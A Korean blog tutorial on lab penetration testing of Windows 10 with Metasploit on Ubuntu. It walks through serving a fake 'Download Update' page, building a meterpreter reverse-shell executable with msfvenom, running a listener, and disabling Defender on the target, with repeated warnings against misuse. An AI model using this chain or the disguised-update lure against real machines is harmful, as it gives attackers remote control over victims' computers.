[LINUX] 우분투에서 Metasploit을 이용하여 윈도우10 모의해킹하기 Windows 10 Penetration Testing Using Metasploit on Ubuntu



자 오늘은 Metasploit을 해볼까 합니다.
우선 보여드리기 전에 말씀 드릴게 있습니다.
해킹은 절대로 어디서든 누구에게든 절대로 남용하지 마시고
모의해킹으로만 공부로만 가상에만 하세요.
절대로 악용해서는 안됩니다. 공부용으로만 하시길 바랍니다!!

Metasploit 참고 링크
Metasploit Tools : https://www.metasploit.com/
Metasploit on Kali Linux 설명 : https://www.kali.org/tools/metasploit-framework/

Ubuntu에서도 되지만 당연히 Kali Linux에서도 됩니다. Debian Linux에서도..
오늘은 윈도우10을 해킹해볼려고 합니다.
우선 악성 파일을 옮기는 것보다는 서버를 열어 웹에서 파일을 다운을 할 수 있게 만들겁니다.
서버는 apache를 이용할게요.
apache2 패키지를 설치해주세요.
설치 전 패키지 업데이트 명령어 "sudo apt update" 먼저 해주는거 필수!!

1
sudo apt install apache2
cs

설치 후 html 폴더 가주시고 apache2 서버도 시작해주세요.


root 계정 들어가주시고 index.html 파일을 vi 에디터로 열어주시고
파일 다운할 수 있게 html 수정해주세요.
제꺼 보고 따라하셔도 됩니다.
밑에 "/bddung.exe"는 곳에는 exe 파일 있는 위치 적어주시면 됩니다.

1
2
3
4
5
6
7
8
<!DOCTYPE html>
<html>
<body>
<title>BDDUNG</title>
<p>Never Download file</p>
<input align="center" type = "button" value="Download Update" onclick="window.open('/bddung.exe')">
</body>
</html>
cs


exe 파일을 악성 실행 파일로 만들어줄게요.

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=4444 -f exe -o bddung.exe
cs


이젠 Metasploit을 실행해줄게요. 작성한 명령어들을 아래에 모아둘게요.

1
2
3
4
5
6
msfconsole
use multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ip{ex) 192.168.0.1}
set LPORT 4444
exploit
cs

exploit까지 되셨다면 윈도우에서 보안을 꺼주세요.
Window Defender 내에 있는 모든 보안을 다 꺼주시고 브라우저 열고 검색창에 공격자 Kali ip 적고 들어가주시고 Download 버튼 클릭해서 파일을 다운해주세요.
다운로드해주시고 실행해주세요. 악성 파일을 여시겠습니까라고 뜰텐데 무시하고 실행하시면 됩니다.
실행을 하면 예를 들면 아래와 같은 모습이겠네요.


실행을 하면 아래와 같이 ip와 함께 연결이 됐다고 뜹니다. 성공이죠


스크린샷과 시스템 정보를 확인해볼까요?




다른 것들도 해고 싶으실 땐 help 명령어를 작성하시면 됩니다.


ip도 확인 가능합니다.


끝..다시 한 번 말씀드리지만 절대로 악용하시면 안됩니다.

댓글 쓰기

0 댓글